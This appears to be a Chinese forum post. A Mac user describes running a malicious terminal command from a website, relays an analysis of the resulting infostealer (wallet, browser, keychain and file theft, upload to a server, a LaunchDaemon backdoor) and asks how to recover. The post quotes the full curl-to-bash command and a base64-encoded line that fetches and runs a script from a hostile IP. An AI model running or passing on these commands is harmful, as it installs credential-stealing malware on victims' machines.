用户周末在Mac上误执行了来自不明网站的恶意脚本，该脚本通过伪装系统对话框窃取用户密码，并针对性地搜寻加密货币钱包（包括浏览器插件和桌面应用）、各类浏览器数据（如登录凭据、Cookie、历史记录、信用卡信息）、个人敏感文件（如钥匙串、备忘录、特定格式文档）。脚本会将窃取的数据打包上传至黑客服务器，并在用户系统中植入持久化后门，甚至尝试替换合法的加密钱包应用。用户在发现异常后已寻求帮助，并对是否需要重装系统以及如何保护账户表示担忧。

🔑 恶意脚本通过弹出的伪造系统对话框，诱骗用户输入开机密码，若密码不正确则对话框会持续骚扰。

💰 该脚本的主要目标是窃取加密货币钱包，包括针对 MetaMask、Phantom、Trust Wallet 等数十种浏览器钱包插件的数据，以及 Exodus、Atomic、Ledger Live、Coinomi、Electrum 等桌面钱包程序的数据。

🌐 脚本会窃取主流浏览器的各种数据，包括保存的登录名和密码、Cookies、历史记录以及信用卡信息，从而威胁用户的在线账户安全。

📄 脚本还会搜寻用户电脑上的敏感文件，例如系统钥匙串文件（可能包含Wi-Fi密码和应用密码）、“备忘录”应用中的所有文本内容，以及“桌面”和“文稿”文件夹中特定的敏感文件类型（如 .pdf, .docx, .txt, .wallet, .key）。

📤 窃取到的所有信息会被打包成 .zip 文件，并上传到黑客的服务器（IP地址为 185.93.89.62），同时脚本会在用户系统中创建一个启动守护进程作为持久化后门，并尝试用恶意版本替换正版的 Ledger Live 钱包应用。

趁周末没事折腾了一下自己的 Mac ，下了一堆乱七八糟的软件

刚刚有个网站给了我一个命令，要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"

感觉是熬夜脑子不清醒了，我真就傻乎乎输入密码执行了脚本，听到 mac 一阵叮叮钉钉的提示音才感觉不对劲

看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本

看到这个命令的时候，脑子都凉了，把脚本喂给 Gemini 告诉我说会去执行以下命令

窃取密码 🔑它会弹出一个伪造的系统对话框，谎称“需要安装应用助手”，诱骗你输入电脑的开机密码。如果你不输入正确的密码，这个对话框会一直骚扰你。

窃取加密货币钱包 💰 (主要目标)浏览器钱包: 它有一个庞大的列表，专门扫描并窃取数十种加密货币钱包浏览器插件的数据，例如 MetaMask 、Phantom 、Trust Wallet 等。

桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据，例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。

窃取各类浏览器数据 🌐它会攻击市面上几乎所有的主流浏览器（ Chrome, Safari, Firefox, Edge, Brave, Opera 等）。

窃取内容包括：保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。

窃取个人敏感文件 📄钥匙串 (Keychain): 复制你整个系统钥匙串文件，里面可能包含你的 Wi-Fi 密码、应用密码等。

备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。

本地文件: 扫描你的“桌面”和“文稿”文件夹，专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。

打包上传，发送给黑客 📤它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。

然后将这个文件上传到黑客的服务器（ IP 地址为 185.93.89.62 ，和你之前那个脚本是同一个地址）。

植入后门并替换正常程序 🚪持久化后门: 它会用你输入的密码，在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑，这个恶意软件也会自动运行，让黑客可以持续控制你的电脑。

程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。

这个是不是只能重装系统了？我还要做什么来保护自己的账户吗